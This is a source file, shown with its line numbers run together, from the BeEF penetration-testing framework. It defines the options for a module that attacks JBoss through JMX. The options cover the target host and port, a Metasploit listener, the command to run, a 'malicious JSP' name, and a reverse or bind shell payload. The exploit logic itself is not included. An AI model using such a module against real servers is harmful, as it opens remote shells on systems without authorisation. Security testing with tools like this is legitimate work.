Path: blob/master/modules/exploits/jboss_jmx_upload_exploit/module.rb
1154 views
#1# Copyright (c) 2006-2025 Wade Alcorn - [email protected]2# Browser Exploitation Framework (BeEF) - https://beefproject.com3# See the file 'doc/COPYING' for copying permission4#5class Jboss_jmx_upload_exploit < BeEF::Core::Command6def self.options7[8{ 'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1' },9{ 'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080' },10{ 'name' => 'lhost', 'ui_label' => 'MSF Listener Host', 'value' => '127.0.0.1' },11{ 'name' => 'lport', 'ui_label' => 'MSF Listener Port (or bind)', 'value' => '6666' },12{ 'name' => 'injectedCommand', 'ui_label' => 'Command to execute', 'value' => 'cmd.exe' },13{ 'name' => 'jspName', 'ui_label' => 'Malicious JSP name', 'value' => rand(32**20).to_s(32) },14{ 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',15'store_fields' => ['payload'], 'store_data' => [['reverse'], ['bind']],16'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true }17]18end1920def post_execute21save({ 'result' => @datastore['result'] })22end23end242526